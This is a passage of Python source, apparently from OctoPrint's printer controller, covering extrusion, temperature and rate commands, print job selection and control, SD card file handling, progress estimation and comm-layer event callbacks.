ValueError(f\"amount must be a valid number: {amount}\")\n\n printer_profile = self._printerProfileManager.get_current_or_default()\n\n # Use specified speed (if any)\n max_e_speed = printer_profile[\"axes\"][\"e\"][\"speed\"]\n\n if speed is None:\n # No speed was specified so default to value configured in printer profile\n extrusion_speed = max_e_speed\n else:\n # Make sure that specified value is not greater than maximum as defined in printer profile\n extrusion_speed = min([speed, max_e_speed])\n\n self.commands(\n [\"G91\", \"M83\", \"G1 E%s F%d\" % (amount, extrusion_speed), \"M82\", \"G90\"],\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.extrude\"},\n )\n\n def change_tool(self, tool, *args, **kwargs):\n if not PrinterInterface.valid_tool_regex.match(tool):\n raise ValueError(f'tool must match \"tool[0-9]+\": {tool}')\n\n tool_num = int(tool[len(\"tool\") :])\n self.commands(\n \"T%d\" % tool_num,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.change_tool\"},\n )\n\n def set_temperature(self, heater, value, *args, **kwargs):\n if not PrinterInterface.valid_heater_regex.match(heater):\n raise ValueError(\n 'heater must match \"tool[0-9]+\", \"bed\" or \"chamber\": {heater}'.format(\n heater=heater\n )\n )\n\n if not isinstance(value, (int, float)) or value < 0:\n raise ValueError(f\"value must be a valid number >= 0: {value}\")\n\n tags = kwargs.get(\"tags\", set()) | {\"trigger:printer.set_temperature\"}\n\n if heater.startswith(\"tool\"):\n printer_profile = self._printerProfileManager.get_current_or_default()\n extruder_count = printer_profile[\"extruder\"][\"count\"]\n shared_nozzle = printer_profile[\"extruder\"][\"sharedNozzle\"]\n if extruder_count > 1 and not shared_nozzle:\n toolNum = int(heater[len(\"tool\") :])\n self.commands(f\"M104 T{toolNum} S{value}\", tags=tags)\n else:\n self.commands(f\"M104 S{value}\", tags=tags)\n\n elif heater == \"bed\":\n self.commands(f\"M140 S{value}\", tags=tags)\n\n elif heater == \"chamber\":\n self.commands(f\"M141 S{value}\", tags=tags)\n\n def set_temperature_offset(self, offsets=None, *args, **kwargs):\n if offsets is None:\n offsets = {}\n\n if not isinstance(offsets, dict):\n raise ValueError(\"offsets must be a dict\")\n\n validated_keys = list(\n filter(lambda x: PrinterInterface.valid_heater_regex.match(x), offsets.keys())\n )\n validated_values = list(\n filter(lambda x: isinstance(x, (int, float)), offsets.values())\n )\n\n if len(validated_keys) != len(offsets):\n raise ValueError(f\"offsets contains invalid keys: {offsets}\")\n if len(validated_values) != len(offsets):\n raise ValueError(f\"offsets contains invalid values: {offsets}\")\n\n if self._comm is None:\n return\n\n self._comm.setTemperatureOffset(offsets)\n self._setOffsets(self._comm.getOffsets())\n\n def _convert_rate_value(self, factor, min_val=None, max_val=None):\n if not isinstance(factor, (int, float)):\n raise ValueError(\"factor is not a number\")\n\n if isinstance(factor, float):\n factor = int(factor * 100)\n\n if min_val and factor < min_val:\n raise ValueError(f\"factor must be a value >={min_val}\")\n elif max_val and factor > max_val:\n raise ValueError(f\"factor must be a value <={max_val}\")\n\n return factor\n\n def feed_rate(self, factor, *args, **kwargs):\n factor = self._convert_rate_value(factor, min_val=1)\n self.commands(\n \"M220 S%d\" % factor,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.feed_rate\"},\n )\n\n def flow_rate(self, factor, *args, **kwargs):\n factor = self._convert_rate_value(factor, min_val=1)\n self.commands(\n \"M221 S%d\" % factor,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.flow_rate\"},\n )\n\n def select_file(\n self, path, sd, printAfterSelect=False, user=None, pos=None, *args, **kwargs\n ):\n if self._comm is None or (self._comm.isBusy() or self._comm.isStreaming()):\n self._logger.info(\"Cannot load file: printer not connected or currently busy\")\n return\n\n self._validateJob(path, sd)\n\n origin = FileDestinations.SDCARD if sd else FileDestinations.LOCAL\n if sd:\n path_on_disk = \"/\" + path\n path_in_storage = path\n else:\n path_on_disk = self._fileManager.path_on_disk(origin, path)\n path_in_storage = self._fileManager.path_in_storage(origin, path_on_disk)\n\n try:\n recovery_data = self._fileManager.get_recovery_data()\n if recovery_data:\n # clean up recovery data if we just selected a different file\n actual_origin = recovery_data.get(\"origin\", None)\n actual_path = recovery_data.get(\"path\", None)\n\n if (\n actual_origin is None\n or actual_path is None\n or actual_origin != origin\n or actual_path != path_in_storage\n ):\n self._fileManager.delete_recovery_data()\n except Exception:\n # anything goes wrong with the recovery data, we ignore it\n self._logger.exception(\n \"Something was wrong with processing the recovery data\"\n )\n\n self._printAfterSelect = printAfterSelect\n self._posAfterSelect = pos\n self._comm.selectFile(\n \"/\" + path if sd else path_on_disk,\n sd,\n user=user,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.select_file\"},\n )\n self._updateProgressData()\n self._setCurrentZ(None)\n\n def unselect_file(self, *args, **kwargs):\n if self._comm is not None and (self._comm.isBusy() or self._comm.isStreaming()):\n return\n\n self._comm.unselectFile()\n self._updateProgressData()\n self._setCurrentZ(None)\n\n def get_file_position(self):\n if self._comm is None:\n return None\n\n with self._selectedFileMutex:\n if self._selectedFile is None:\n return None\n\n return self._comm.getFilePosition()\n\n def get_markings(self):\n return self._markings\n\n def start_print(self, pos=None, user=None, *args, **kwargs):\n \"\"\"\n Starts the currently loaded print job.\n Only starts if the printer is connected and operational, not currently printing and a printjob is loaded\n \"\"\"\n if (\n self._comm is None\n or not self._comm.isOperational()\n or self._comm.isPrinting()\n ):\n return\n\n with self._selectedFileMutex:\n if self._selectedFile is None:\n return\n\n self._fileManager.delete_recovery_data()\n\n self._lastProgressReport = None\n self._updateProgressData()\n self._setCurrentZ(None)\n self._comm.startPrint(\n pos=pos,\n user=user,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.start_print\"},\n )\n\n def pause_print(self, user=None, *args, **kwargs):\n \"\"\"\n Pause the current printjob.\n \"\"\"\n if self._comm is None:\n return\n\n if self._comm.isPaused():\n return\n\n self._comm.setPause(\n True,\n user=user,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.pause_print\"},\n )\n\n def resume_print(self, user=None, *args, **kwargs):\n \"\"\"\n Resume the current printjob.\n \"\"\"\n if self._comm is None:\n return\n\n if not self._comm.isPaused():\n return\n\n self._comm.setPause(\n False,\n user=user,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.resume_print\"},\n )\n\n def cancel_print(self, user=None, *args, **kwargs):\n \"\"\"\n Cancel the current printjob.\n \"\"\"\n if self._comm is None:\n return\n\n # tell comm layer to cancel - will also trigger our cancelled handler\n # for further processing\n self._comm.cancelPrint(\n user=user, tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.cancel_print\"}\n )\n\n def log_lines(self, *lines):\n serial_logger = logging.getLogger(\"SERIAL\")\n self.on_comm_log(\"\\n\".join(lines))\n for line in lines:\n serial_logger.debug(line)\n\n def get_state_string(self, state=None, *args, **kwargs):\n if self._comm is None:\n return \"Offline\"\n else:\n return self._comm.getStateString(state=state)\n\n def get_state_id(self, state=None, *args, **kwargs):\n if self._comm is None:\n return \"OFFLINE\"\n else:\n return self._comm.getStateId(state=state)\n\n def get_error(self):\n if self._comm is None:\n return \"\"\n else:\n return self._comm.getErrorString()\n\n def get_current_data(self, *args, **kwargs):\n return util.thaw_frozendict(self._stateMonitor.get_current_data())\n\n def get_current_job(self, *args, **kwargs):\n currentData = self._stateMonitor.get_current_data()\n return util.thaw_frozendict(currentData[\"job\"])\n\n def get_current_temperatures(self, *args, **kwargs):\n if self._comm is not None:\n offsets = self._comm.getOffsets()\n else:\n offsets = {}\n\n last = self._temps.last\n if last is None:\n return {}\n\n return {\n key: {\n \"actual\": value[\"actual\"],\n \"target\": value[\"target\"],\n \"offset\": offsets[key] if offsets.get(key) is not None else 0,\n }\n for key, value in last.items()\n if key != \"time\"\n }\n\n def get_temperature_history(self, *args, **kwargs):\n return list(self._temps)\n\n def get_current_connection(self, *args, **kwargs):\n if self._comm is None:\n return \"Closed\", None, None, None\n\n port, baudrate = self._comm.getConnection()\n printer_profile = self._printerProfileManager.get_current_or_default()\n return self._comm.getStateString(), port, baudrate, printer_profile\n\n def is_closed_or_error(self, *args, **kwargs):\n return self._comm is None or self._comm.isClosedOrError()\n\n def is_operational(self, *args, **kwargs):\n return self._comm is not None and self._comm.isOperational()\n\n def is_printing(self, *args, **kwargs):\n return self._comm is not None and self._comm.isPrinting()\n\n def is_cancelling(self, *args, **kwargs):\n return self._comm is not None and self._comm.isCancelling()\n\n def is_pausing(self, *args, **kwargs):\n return self._comm is not None and self._comm.isPausing()\n\n def is_paused(self, *args, **kwargs):\n return self._comm is not None and self._comm.isPaused()\n\n def is_resuming(self, *args, **kwargs):\n return self._comm is not None and self._comm.isResuming()\n\n def is_finishing(self, *args, **kwargs):\n return self._comm is not None and self._comm.isFinishing()\n\n def is_error(self, *args, **kwargs):\n return self._comm is not None and self._comm.isError()\n\n def is_ready(self, *args, **kwargs):\n return (\n self.is_operational()\n and not self._comm.isBusy()\n # isBusy is true when paused\n and not self._comm.isStreaming()\n )\n\n def is_sd_ready(self, *args, **kwargs):\n if not settings().getBoolean([\"feature\", \"sdSupport\"]) or self._comm is None:\n return False\n else:\n return self._comm.isSdReady()\n\n # ~~ sd file handling\n\n def get_sd_files(self, *args, **kwargs):\n if not self.is_sd_ready():\n return []\n\n if kwargs.get(\"refresh\"):\n self.refresh_sd_files(blocking=True)\n\n return list(\n map(\n lambda x: {\"name\": x[0][1:], \"size\": x[1], \"display\": x[2], \"date\": x[3]},\n self._comm.getSdFiles(),\n )\n )\n\n def add_sd_file(\n self, filename, path, on_success=None, on_failure=None, *args, **kwargs\n ):\n if not self._comm or self._comm.isBusy() or not self._comm.isSdReady():\n self._logger.error(\"No connection to printer or printer is busy\")\n return\n\n self._streamingFinishedCallback = on_success\n self._streamingFailedCallback = on_failure\n\n def sd_upload_started(local_filename, remote_filename):\n eventManager().fire(\n Events.TRANSFER_STARTED,\n {\"local\": local_filename, \"remote\": remote_filename},\n )\n\n def sd_upload_succeeded(local_filename, remote_filename, elapsed):\n payload = {\n \"local\": local_filename,\n \"remote\": remote_filename,\n \"time\": elapsed,\n }\n eventManager().fire(Events.TRANSFER_DONE, payload)\n if callable(self._streamingFinishedCallback):\n self._streamingFinishedCallback(\n remote_filename, remote_filename, FileDestinations.SDCARD\n )\n\n def sd_upload_failed(local_filename, remote_filename, elapsed):\n payload = {\n \"local\": local_filename,\n \"remote\": remote_filename,\n \"time\": elapsed,\n }\n eventManager().fire(Events.TRANSFER_FAILED, payload)\n if callable(self._streamingFailedCallback):\n self._streamingFailedCallback(\n remote_filename, remote_filename, FileDestinations.SDCARD\n )\n\n for name, hook in self.sd_card_upload_hooks.items():\n # first sd card upload plugin that feels responsible gets the job\n try:\n result = hook(\n self,\n filename,\n path,\n sd_upload_started,\n sd_upload_succeeded,\n sd_upload_failed,\n *args,\n **kwargs,\n )\n if result is not None:\n return result\n except Exception:\n self._logger.exception(\n \"There was an error running the sd upload \"\n \"hook provided by plugin {}\".format(name),\n extra={\"plugin\": name},\n )\n\n else:\n # no plugin feels responsible, use the default implementation\n return self._add_sd_file(filename, path, tags=kwargs.get(\"tags\"))\n\n def _get_free_remote_name(self, filename):\n self.refresh_sd_files(blocking=True)\n existingSdFiles = list(map(lambda x: x[0], self._comm.getSdFiles()))\n\n if valid_file_type(filename, \"gcode\"):\n # figure out remote filename\n remote_name = util.get_dos_filename(\n filename,\n existing_filenames=existingSdFiles,\n extension=\"gco\",\n whitelisted_extensions=[\"gco\", \"g\"],\n )\n else:\n # probably something else added through a plugin, use it's basename as-is\n remote_name = os.path.basename(filename)\n\n return remote_name\n\n def _add_sd_file(self, filename, path, tags=None):\n if tags is None:\n tags = set()\n\n self._create_estimator(\"stream\")\n remote_name = self._comm.startFileTransfer(\n path,\n filename,\n special=not valid_file_type(filename, \"gcode\"),\n tags=tags | {\"trigger:printer.add_sd_file\"},\n )\n\n return remote_name\n\n def delete_sd_file(self, filename, *args, **kwargs):\n if not self._comm or not self._comm.isSdReady():\n return\n self._comm.deleteSdFile(\n \"/\" + filename,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.delete_sd_file\"},\n )\n\n def init_sd_card(self, *args, **kwargs):\n if not self._comm or self._comm.isSdReady():\n return\n self._comm.initSdCard(\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.init_sd_card\"}\n )\n\n def release_sd_card(self, *args, **kwargs):\n if not self._comm or not self._comm.isSdReady():\n return\n self._comm.releaseSdCard(\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.release_sd_card\"}\n )\n\n def refresh_sd_files(self, blocking=False, *args, **kwargs):\n \"\"\"\n Refreshes the list of file stored on the SD card attached to printer (if available and printer communication\n available). Optional blocking parameter allows making the method block (max 10s) until the file list has been\n received (and can be accessed via self._comm.getSdFiles()). Defaults to an asynchronous operation.\n \"\"\"\n if not self._comm or not self._comm.isSdReady():\n return\n self._comm.refreshSdFiles(\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.refresh_sd_files\"},\n blocking=blocking,\n timeout=kwargs.get(\"timeout\", 10),\n )\n\n # ~~ state monitoring\n\n def _setOffsets(self, offsets):\n self._stateMonitor.set_temp_offsets(offsets)\n\n def _setCurrentZ(self, currentZ):\n self._currentZ = currentZ\n self._stateMonitor.set_current_z(self._currentZ)\n\n def _setState(self, state, state_string=None, error_string=None):\n if state_string is None:\n state_string = self.get_state_string()\n if error_string is None:\n error_string = self.get_error()\n\n self._state = state\n self._stateMonitor.set_state(\n self._dict(text=state_string, flags=self._getStateFlags(), error=error_string)\n )\n\n payload = {\n \"state_id\": self.get_state_id(self._state),\n \"state_string\": self.get_state_string(self._state),\n }\n eventManager().fire(Events.PRINTER_STATE_CHANGED, payload)\n\n def _addLog(self, log):\n self._log.append(log)\n self._stateMonitor.add_log(log)\n\n def _addMessage(self, message):\n self._messages.append(message)\n self._stateMonitor.add_message(message)\n\n def _updateProgressData(\n self,\n completion=None,\n filepos=None,\n printTime=None,\n printTimeLeft=None,\n printTimeLeftOrigin=None,\n ):\n self._stateMonitor.set_progress(\n self._dict(\n completion=int(completion * 100) if completion is not None else None,\n filepos=filepos,\n printTime=int(printTime) if printTime is not None else None,\n printTimeLeft=int(printTimeLeft) if printTimeLeft is not None else None,\n printTimeLeftOrigin=printTimeLeftOrigin,\n )\n )\n\n def _updateProgressDataCallback(self):\n if self._comm is None:\n progress = None\n filepos = None\n printTime = None\n cleanedPrintTime = None\n else:\n progress = self._comm.getPrintProgress()\n filepos = self._comm.getPrintFilepos()\n printTime = self._comm.getPrintTime()\n cleanedPrintTime = self._comm.getCleanedPrintTime()\n\n printTimeLeft = printTimeLeftOrigin = None\n estimator = self._estimator\n if progress is not None:\n progress_int = int(progress * 100)\n if self._lastProgressReport != progress_int:\n self._lastProgressReport = progress_int\n self._reportPrintProgressToPlugins(progress_int)\n\n if progress == 0:\n printTimeLeft = None\n printTimeLeftOrigin = None\n elif progress == 1:\n printTimeLeft = 0\n printTimeLeftOrigin = None\n elif estimator is not None:\n statisticalTotalPrintTime = None\n statisticalTotalPrintTimeType = None\n with self._selectedFileMutex:\n if (\n self._selectedFile\n and \"estimatedPrintTime\" in self._selectedFile\n and self._selectedFile[\"estimatedPrintTime\"]\n ):\n statisticalTotalPrintTime = self._selectedFile[\n \"estimatedPrintTime\"\n ]\n statisticalTotalPrintTimeType = self._selectedFile.get(\n \"estimatedPrintTimeType\", None\n )\n\n try:\n printTimeLeft, printTimeLeftOrigin = estimator.estimate(\n progress,\n printTime,\n cleanedPrintTime,\n statisticalTotalPrintTime,\n statisticalTotalPrintTimeType,\n )\n if printTimeLeft is not None:\n printTimeLeft = int(printTimeLeft)\n except Exception:\n self._logger.exception(\n f\"Error while estimating print time via {estimator}\"\n )\n\n return self._dict(\n completion=progress * 100 if progress is not None else None,\n filepos=filepos,\n printTime=int(printTime) if printTime is not None else None,\n printTimeLeft=int(printTimeLeft) if printTimeLeft is not None else None,\n printTimeLeftOrigin=printTimeLeftOrigin,\n )\n\n def _updateResendDataCallback(self):\n if not self._comm:\n return self._dict(count=0, transmitted=0, ratio=0)\n return self._dict(\n count=self._comm.received_resends,\n transmitted=self._comm.transmitted_lines,\n ratio=int(self._comm.resend_ratio * 100),\n )\n\n def _addTemperatureData(self, tools=None, bed=None, chamber=None, custom=None):\n if tools is None:\n tools = {}\n if custom is None:\n custom = {}\n\n data = {\"time\": int(time.time())}\n for tool in tools.keys():\n data[\"tool%d\" % tool] = self._dict(\n actual=tools[tool][0], target=tools[tool][1]\n )\n if bed is not None and isinstance(bed, tuple):\n data[\"bed\"] = self._dict(actual=bed[0], target=bed[1])\n if chamber is not None and isinstance(chamber, tuple):\n data[\"chamber\"] = self._dict(actual=chamber[0], target=chamber[1])\n for identifier, values in custom.items():\n data[identifier] = self._dict(actual=values[0], target=values[1])\n\n self._temps.append(data)\n\n self._stateMonitor.add_temperature(self._dict(**data))\n\n def _validateJob(self, filename, sd):\n if not valid_file_type(filename, type=\"machinecode\"):\n raise InvalidFileType(f\"{filename} is not a machinecode file, cannot print\")\n\n if sd:\n return\n\n path_on_disk = self._fileManager.path_on_disk(FileDestinations.LOCAL, filename)\n if os.path.isabs(filename) and not filename == path_on_disk:\n raise InvalidFileLocation(\n \"{} is not located within local storage, cannot select for printing\".format(\n filename\n )\n )\n if not os.path.isfile(path_on_disk):\n raise InvalidFileLocation(\n \"{} does not exist in local storage, cannot select for printing\".format(\n filename\n )\n )\n\n def _setJobData(self, filename, filesize, sd, user=None, data=None):\n with self._selectedFileMutex:\n if filename is not None:\n if sd:\n name_in_storage = filename\n if name_in_storage.startswith(\"/\"):\n name_in_storage = name_in_storage[1:]\n path_in_storage = name_in_storage\n path_on_disk = None\n else:\n path_in_storage = self._fileManager.path_in_storage(\n FileDestinations.LOCAL, filename\n )\n path_on_disk = self._fileManager.path_on_disk(\n FileDestinations.LOCAL, filename\n )\n _, name_in_storage = self._fileManager.split_path(\n FileDestinations.LOCAL, path_in_storage\n )\n self._selectedFile = {\n \"filename\": path_in_storage,\n \"filesize\": filesize,\n \"sd\": sd,\n \"estimatedPrintTime\": None,\n \"user\": user,\n }\n else:\n self._selectedFile = None\n self._stateMonitor.set_job_data(\n self._dict(\n file=self._dict(\n name=None,\n path=None,\n display=None,\n origin=None,\n size=None,\n date=None,\n ),\n estimatedPrintTime=None,\n averagePrintTime=None,\n lastPrintTime=None,\n filament=None,\n user=None,\n )\n )\n return\n\n estimatedPrintTime = None\n lastPrintTime = None\n averagePrintTime = None\n date = None\n filament = None\n display_name = name_in_storage\n\n if path_on_disk:\n # Use an int for mtime because it could be float and the\n # javascript needs to exact match\n date = int(os.stat(path_on_disk).st_mtime)\n\n try:\n fileData = self._fileManager.get_metadata(\n FileDestinations.SDCARD if sd else FileDestinations.LOCAL,\n path_on_disk,\n )\n except Exception:\n self._logger.exception(\"Error generating fileData\")\n fileData = None\n if fileData is not None:\n if fileData.get(\"display\"):\n display_name = fileData[\"display\"]\n if isinstance(fileData.get(\"analysis\"), dict):\n if estimatedPrintTime is None and fileData[\"analysis\"].get(\n \"estimatedPrintTime\"\n ):\n estimatedPrintTime = fileData[\"analysis\"][\n \"estimatedPrintTime\"\n ]\n if fileData[\"analysis\"].get(\"filament\"):\n filament = fileData[\"analysis\"][\"filament\"]\n if isinstance(fileData.get(\"statistics\"), dict):\n printer_profile = (\n self._printerProfileManager.get_current_or_default()[\"id\"]\n )\n if printer_profile in fileData[\"statistics\"].get(\n \"averagePrintTime\", {}\n ):\n averagePrintTime = fileData[\"statistics\"][\"averagePrintTime\"][\n printer_profile\n ]\n if printer_profile in fileData[\"statistics\"].get(\n \"lastPrintTime\", {}\n ):\n lastPrintTime = fileData[\"statistics\"][\"lastPrintTime\"][\n printer_profile\n ]\n\n if averagePrintTime is not None:\n self._selectedFile[\"estimatedPrintTime\"] = averagePrintTime\n self._selectedFile[\"estimatedPrintTimeType\"] = \"average\"\n elif estimatedPrintTime is not None:\n # TODO apply factor which first needs to be tracked!\n self._selectedFile[\"estimatedPrintTime\"] = estimatedPrintTime\n self._selectedFile[\"estimatedPrintTimeType\"] = \"analysis\"\n\n elif data:\n display_name = data.longname\n date = data.timestamp\n\n self._stateMonitor.set_job_data(\n self._dict(\n file=self._dict(\n name=name_in_storage,\n path=path_in_storage,\n display=display_name,\n origin=FileDestinations.SDCARD if sd else FileDestinations.LOCAL,\n size=filesize,\n date=date,\n ),\n estimatedPrintTime=estimatedPrintTime,\n averagePrintTime=averagePrintTime,\n lastPrintTime=lastPrintTime,\n filament=filament,\n user=user,\n )\n )\n\n def _updateJobUser(self, user):\n with self._selectedFileMutex:\n if (\n self._selectedFile is not None\n and self._selectedFile.get(\"user\", None) != user\n ):\n self._selectedFile[\"user\"] = user\n\n job_data = self.get_current_job()\n self._stateMonitor.set_job_data(\n self._dict(\n file=job_data[\"file\"],\n estimatedPrintTime=job_data[\"estimatedPrintTime\"],\n averagePrintTime=job_data[\"averagePrintTime\"],\n lastPrintTime=job_data[\"lastPrintTime\"],\n filament=job_data[\"filament\"],\n user=user,\n )\n )\n\n def _sendInitialStateUpdate(self, callback):\n try:\n data = self._stateMonitor.get_current_data()\n data.update(\n temps=list(self._temps),\n logs=list(self._log),\n messages=list(self._messages),\n markings=list(self._markings),\n )\n\n plugin_data = self._get_additional_plugin_data(initial=False)\n if plugin_data:\n data.update(plugins=copy.deepcopy(plugin_data))\n\n callback.on_printer_send_initial_data(data)\n except Exception:\n self._logger.exception(\n \"Error while pushing initial state update to callback {}\".format(\n callback\n ),\n extra={\"callback\": fqcn(callback)},\n )\n\n def _getStateFlags(self):\n return self._dict(\n operational=self.is_operational(),\n printing=self.is_printing(),\n cancelling=self.is_cancelling(),\n pausing=self.is_pausing(),\n resuming=self.is_resuming(),\n finishing=self.is_finishing(),\n closedOrError=self.is_closed_or_error(),\n error=self.is_error(),\n paused=self.is_paused(),\n ready=self.is_ready(),\n sdReady=self.is_sd_ready(),\n )\n\n # ~~ comm.MachineComPrintCallback implementation\n\n def on_comm_log(self, message):\n \"\"\"\n Callback method for the comm object, called upon log output.\n \"\"\"\n self._addLog(to_unicode(message, \"utf-8\", errors=\"replace\"))\n\n def on_comm_temperature_update(self, tools, bed, chamber, custom=None):\n if custom is None:\n custom = {}\n self._addTemperatureData(\n tools=copy.deepcopy(tools),\n bed=copy.deepcopy(bed),\n chamber=copy.deepcopy(chamber),\n custom=copy.deepcopy(custom),\n )\n\n def on_comm_position_update(self, position, reason=None):\n payload = {\"reason\": reason}\n payload.update(position)\n eventManager().fire(Events.POSITION_UPDATE, payload)\n\n def on_comm_state_change(self, state):\n \"\"\"\n Callback method for the comm object, called if the connection state changes.\n \"\"\"\n oldState = self._state\n\n state_string = None\n error_string = None\n if self._comm is not None:\n state_string = self._comm.getStateString()\n error_string = self._comm.getErrorString()\n\n if oldState in (comm.MachineCom.STATE_PRINTING,):\n # if we were still printing and went into an error state, mark the print as failed\n if state in (\n comm.MachineCom.STATE_CLOSED,\n comm.MachineCom.STATE_ERROR,\n comm.MachineCom.STATE_CLOSED_WITH_ERROR,\n ):\n with self._selectedFileMutex:\n if self._selectedFile is not None:\n payload = self._payload_for_print_job_event()\n if payload:\n payload[\"time\"] = self._comm.getPrintTime()\n payload[\"reason\"] = \"error\"\n payload[\"error\"] = self._comm.getErrorString()\n\n def finalize():\n self._fileManager.log_print(\n payload[\"origin\"],\n payload[\"path\"],\n time.time(),\n payload[\"time\"],\n False,\n self._printerProfileManager.get_current_or_default()[\n \"id\"\n ],\n )\n eventManager().fire(Events.PRINT_FAILED, payload)\n\n thread = threading.Thread(target=finalize)\n thread.daemon = True\n thread.start()\n\n try:\n self._analysisQueue.resume() # printing done, put those cpu cycles to good use\n except Exception:\n self._logger.exception(\"Error while resuming the analysis queue\")\n\n elif state == comm.MachineCom.STATE_PRINTING:\n if settings().get([\"gcodeAnalysis\", \"runAt\"]) == \"idle\":\n try:\n self._analysisQueue.pause() # only analyse files while idle\n except Exception:\n self._logger.exception(\"Error while pausing the analysis queue\")\n\n if (\n state == comm.MachineCom.STATE_CLOSED\n or state == comm.MachineCom.STATE_CLOSED_WITH_ERROR\n ):\n if self._comm is not None:\n self._comm = None\n\n with self._selectedFileMutex:\n if self._selectedFile is not None:\n eventManager().fire(Events.FILE_DESELECTED)\n self._setJobData(None, None, None)\n\n self._updateProgressData()\n self._setCurrentZ(None)\n self._setOffsets(None)\n self._addTemperatureData()\n self._printerProfileManager.deselect()\n\n eventManager().fire(Events.DISCONNECTED)\n\n self._setState(state, state_string=state_string, error_string=error_string)\n\n def on_comm_message(self, message):\n \"\"\"\n Callback method for the comm object, called upon message exchanges via serial.\n Stores the message in the message buffer, truncates buffer to the last 300 lines.\n \"\"\"\n self._addMessage(to_unicode(message, \"utf-8\", errors=\"replace\"))\n\n def on_comm_progress(self):\n \"\"\"\n Callback method for the comm object, called upon any change in progress of the printjob.\n Triggers storage of new values for printTime, printTimeLeft and the current progress.\n \"\"\"\n\n self._stateMonitor.trigger_progress_update()\n\n def on_comm_z_change(self, newZ):\n \"\"\"\n Callback method for the comm object, called upon change of the z-layer.\n \"\"\"\n oldZ = self._currentZ\n if newZ != oldZ:\n # we have to react to all z-changes, even those that might \"go backward\" due to a slicer's retraction or\n # anti-backlash-routines. Event subscribes should individually take care to filter out \"wrong\" z-changes\n eventManager().fire(Events.Z_CHANGE, {\"new\": newZ, \"old\": oldZ})\n\n self._setCurrentZ(newZ)\n\n def on_comm_sd_state_change(self, sdReady):\n self._stateMonitor.set_state(\n self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n )\n )\n\n def on_comm_sd_files(self, files):\n eventManager().fire(Events.UPDATED_FILES, {\"type\": \"printables\"})\n\n def on_comm_file_selected(self, full_path, size, sd, user=None, data=None):\n if full_path is not None:\n payload = self._payload_for_print_job_event(\n location=FileDestinations.SDCARD if sd else FileDestinations.LOCAL,\n print_job_file=full_path,\n print_job_user=user,\n action_user=user,\n )\n eventManager().fire(Events.FILE_SELECTED, payload)\n self._logger_job.info(\n \"Print job selected - origin: {}, path: {}, owner: {}, user: {}\".format(\n payload.get(\"origin\"),\n payload.get(\"path\"),\n payload.get(\"owner\"),\n payload.get(\"user\"),\n )\n )\n else:\n eventManager().fire(Events.FILE_DESELECTED)\n self._logger_job.info(\n \"Print job deselected - user: {}\".format(user if user else \"n/a\")\n )\n\n self._setJobData(full_path, size, sd, user=user, data=data)\n self._stateMonitor.set_state(\n self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n )\n )\n\n self._create_estimator()\n\n if self._printAfterSelect:\n self._printAfterSelect = False\n self.start_print(pos=self._posAfterSelect, user=user)\n\n def on_comm_print_job_started(self, suppress_script=False, user=None):\n self._updateJobUser(\n user\n ) # the final job owner should always be whoever _started_ the job\n self._stateMonitor.trigger_progress_update()\n payload = self._payload_for_print_job_event(print_job_user=user, action_user=user)\n if payload:\n eventManager().fire(Events.PRINT_STARTED, payload)\n eventManager().fire(\n Events.CHART_MARKED,\n {\"type\": \"print\", \"label\": \"Start\"},\n )\n self._logger_job.info(\n \"Print job started - origin: {}, path: {}, owner: {}, user: {}\".format(\n payload.get(\"origin\"),\n payload.get(\"path\"),\n payload.get(\"owner\"),\n payload.get(\"user\"),\n )\n )\n\n if not suppress_script:\n self.script(\n \"beforePrintStarted\",\n context={\"event\": payload},\n part_of_job=True,\n must_be_set=False,\n )\n\n def on_comm_print_job_done(self, suppress_script=False):\n self._fileManager.delete_recovery_data()\n\n payload = self._payload_for_print_job_event()\n if payload:\n payload[\"time\"] = self._comm.getPrintTime()\n eventManager().fire(\n Events.CHART_MARKED,\n {\"type\": \"done\", \"label\": \"Done\"},\n )\n self._updateProgressData(\n completion=1.0,\n filepos=payload[\"size\"],\n printTime=payload[\"time\"],\n printTimeLeft=0,\n )\n self._stateMonitor.set_state(\n self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n )\n )\n\n eventManager().fire(Events.PRINT_DONE, payload)\n self._logger_job.info(\n \"Print job done - origin: {}, path: {}, owner: {}\".format(\n payload.get(\"origin\"),\n payload.get(\"path\"),\n payload.get(\"owner\"),\n )\n )\n\n if not suppress_script:\n self.script(\n \"afterPrintDone\",\n context={\"event\": payload},\n part_of_job=True,\n must_be_set=False,\n )\n\n def log_print():\n self._fileManager.log_print(\n payload[\"origin\"],\n payload[\"path\"],\n time.time(),\n payload[\"time\"],\n True,\n self._printerProfileManager.get_current_or_default()[\"id\"],\n )\n\n thread = threading.Thread(target=log_print)\n thread.daemon = True\n thread.start()\n\n else:\n self._updateProgressData()\n self._stateMonitor.set_state(\n self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n )\n )\n\n def on_comm_print_job_cancelling(self, firmware_error=None, user=None):\n payload = self._payload_for_print_job_event(action_user=user)\n if payload:\n if firmware_error:\n payload[\"firmwareError\"] = firmware_error\n eventManager().fire(Events.PRINT_CANCELLING, payload)\n\n def on_comm_print_job_cancelled(self, suppress_script=False, user=None):\n self._setCurrentZ(None)\n self._updateProgressData()\n\n payload = self._payload_for_print_job_event(\n position=self._comm.cancel_position.as_dict()\n if self._comm and self._comm.cancel_position\n else None,\n action_user=user,\n )\n if payload:\n payload[\"time\"] = self._comm.getPrintTime()\n\n eventManager().fire(Events.PRINT_CANCELLED, payload)\n eventManager().fire(\n Events.CHART_MARKED,\n {\"type\": \"cancel\", \"label\": \"Cancel\"},\n )\n self._logger_job.info(\n \"Print job cancelled - origin: {}, path: {}, owner: {}, user: {}\".format(\n payload.get(\"origin\"),\n payload.get(\"path\"),\n payload.get(\"owner\"),\n 